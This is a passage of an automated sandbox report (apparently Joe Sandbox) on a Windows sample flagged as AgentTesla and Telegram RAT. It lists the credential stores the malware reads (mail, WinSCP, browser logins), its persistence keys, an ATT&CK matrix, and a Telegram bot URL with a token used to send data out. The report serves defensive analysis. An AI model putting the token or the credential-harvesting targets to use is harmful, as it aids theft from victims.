                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0123F53C GetUserNameW,

                Stealing of Sensitive Information

                barindex
                Yara detected Telegram RAT
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Qasvjoldkyh.exe PID: 388, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR
                Yara detected AgentTesla
                Source: Yara matchFile source: 00000013.00000002.616219501.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.618527573.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Telegram RAT
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Qasvjoldkyh.exe PID: 388, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR
                Yara detected AgentTesla
                Source: Yara matchFile source: 00000013.00000002.616219501.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.618527573.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts211
                Windows Management Instrumentation                		11
                Registry Run Keys / Startup Folder                		112
                Process Injection                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                Account Discovery                		Remote Services1
                Archive Collected Data                		Exfiltration Over Other Network Medium1
                Web Service                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                PowerShell                		Boot or Logon Initialization Scripts11
                Registry Run Keys / Startup Folder                		1
                Deobfuscate/Decode Files or Information                		111
                Input Capture                		1
                File and Directory Discovery                		Remote Desktop Protocol1
                Data from Local System                		Exfiltration Over Bluetooth1
                Ingress Tool Transfer                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                Masquerading                		1
                Credentials in Registry                		114
                System Information Discovery                		SMB/Windows Admin Shares1
                Email Collection                		Automated Exfiltration11
                Encrypted Channel                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)131
                Virtualization/Sandbox Evasion                		NTDS211
                Security Software Discovery                		Distributed Component Object Model111
                Input Capture                		Scheduled Transfer3
                Non-Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script112
                Process Injection                		LSA Secrets2
                Process Discovery                		SSH1
                Clipboard Data                		Data Transfer Size Limits14
                Application Layer Protocol                		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                Hidden Files and Directories                		Cached Domain Credentials131
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                System Owner/User Discovery                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                Remote System Discovery                		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                System Network Configuration Discovery                		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830902 Sample: file.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 51 api4.ipify.org 2->51 53 api.telegram.org 2->53 55 api.ipify.org 2->55 65 Snort IDS alert for network traffic 2->65 67 Multi AV Scanner detection for submitted file 2->67 69 Yara detected Telegram RAT 2->69 71 5 other signatures 2->71 8 file.exe 1 8 2->8         started        12 Qasvjoldkyh.exe 4 2->12         started        14 kDPmkTm.exe 4 2->14         started        16 2 other processes 2->16 signatures3 process4 file5 45 C:\Users\user\AppData\...\Qasvjoldkyh.exe, PE32 8->45 dropped 47 C:\Users\...\Qasvjoldkyh.exe:Zone.Identifier, ASCII 8->47 dropped 49 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 8->49 dropped 85 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->85 87 May check the online IP address of the machine 8->87 89 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 8->89 91 Creates multiple autostart registry keys 8->91 18 file.exe 17 5 8->18         started        23 powershell.exe 15 8->23         started        25 file.exe 8->25         started        93 Multi AV Scanner detection for dropped file 12->93 95 Machine Learning detection for dropped file 12->95 97 Encrypted powershell cmdline option found 12->97 27 Qasvjoldkyh.exe 12->27         started        29 powershell.exe 12->29         started        99 Injects a PE file into a foreign processes 14->99 31 powershell.exe 14->31         started        33 kDPmkTm.exe 14->33         started        signatures6 process7 dnsIp8 57 api4.ipify.org 104.237.62.211, 443, 49697, 49700 WEBNXUS United States 18->57 59 api.telegram.org 149.154.167.220, 443, 49698, 49702 TELEGRAMRU United Kingdom 18->59 63 2 other IPs or domains 18->63 41 C:\Users\user\AppData\Roaming\...\kDPmkTm.exe, PE32 18->41 dropped 43 C:\Users\user\...\kDPmkTm.exe:Zone.Identifier, ASCII 18->43 dropped 73 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->73 75 Tries to steal Mail credentials (via file / registry access) 18->75 77 Creates multiple autostart registry keys 18->77 35 conhost.exe 23->35         started        61 api.ipify.org 27->61 79 Tries to harvest and steal browser information (history, passwords, etc) 27->79 81 Hides that the sample has been downloaded from the Internet (zone.identifier) 27->81 83 Installs a global keyboard hook 27->83 37 conhost.exe 29->37         started        39 conhost.exe 31->39         started        file9 signatures10 process11

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe36%ReversingLabsByteCode-MSIL.Trojan.Pwsx
                file.exe44%VirustotalBrowse
                file.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe36%ReversingLabsByteCode-MSIL.Trojan.Pwsx
                C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe44%VirustotalBrowse
                C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe36%ReversingLabsByteCode-MSIL.Trojan.Pwsx

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                15.2.Qasvjoldkyh.exe.400000.0.unpack100%AviraHEUR/AGEN.1203035Download File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://api.telegram.org40%URL Reputationsafe
                https://api.telegram.org40%URL Reputationsafe
                https://api.ipify.org40%URL Reputationsafe
                https://urn.to/r/sds_see0%URL Reputationsafe
                http://james.newtonking.com/projects/json0%URL Reputationsafe
                http://www.microsoft.s0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                api4.ipify.org
                		104.237.62.211
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    api.ipify.org
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/false
                        		high
                        https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocumentfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.ipify.orgfile.exe, 00000004.00000002.618527573.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://api.telegram.org4file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.microsoft.skDPmkTm.exe, 00000013.00000002.653315830.0000000006C60000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.orgfile.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://api.ipify.org4Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.newtonsoft.com/jsonschemakDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.newtonsoft.com/jsonkDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.nuget.org/packages/Newtonsoft.Json.Bsonfile.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://api4.ipify.orgQasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C40000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://urn.to/r/sds_seefile.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://api.telegram.orgfile.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000004.00000002.618527573.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://james.newtonking.com/projects/jsonkDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://api.ipify.orgQasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C40000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              149.154.167.220
                                              		api.telegram.orgUnited Kingdom
                                              		62041TELEGRAMRUfalse
                                              104.237.62.211
                                              		api4.ipify.orgUnited States
                                              		18450WEBNXUSfalse

                                              Private

                                              IP
                                              192.168.2.1

                                              General Information

                                              Joe Sandbox Version:37.0.0 Beryl
                                              Analysis ID:830902
                                              Start date and time:2023-03-20 19:36:46 +01:00
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 11m 37s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:20
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample file name:file.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@22/15@8/3
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HDC Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              19:37:51API Interceptor102x Sleep call for process: powershell.exe modified
                                              19:38:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Qasvjoldkyh "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
                                              19:38:23API Interceptor752x Sleep call for process: file.exe modified
                                              19:38:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                              19:38:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Qasvjoldkyh "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
                                              19:38:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                              19:39:35API Interceptor18x Sleep call for process: Qasvjoldkyh.exe modified
                                              19:39:48API Interceptor116x Sleep call for process: kDPmkTm.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASNs

                                              No context

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Qasvjoldkyh.exe.log

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1459
                                              Entropy (8bit):5.3420905847574325
                                              Encrypted:false
                                              SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                              MD5:FB4B7720101F874710FF986326F7980F
                                              SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                              SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                              SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):1459
                                              Entropy (8bit):5.3420905847574325
                                              Encrypted:false
                                              SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                              MD5:FB4B7720101F874710FF986326F7980F
                                              SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                              SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                              SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
                                              Malicious:true
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kDPmkTm.exe.log

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1459
                                              Entropy (8bit):5.3420905847574325
                                              Encrypted:false
                                              SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                              MD5:FB4B7720101F874710FF986326F7980F
                                              SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                              SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                              SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
                                              Malicious:false
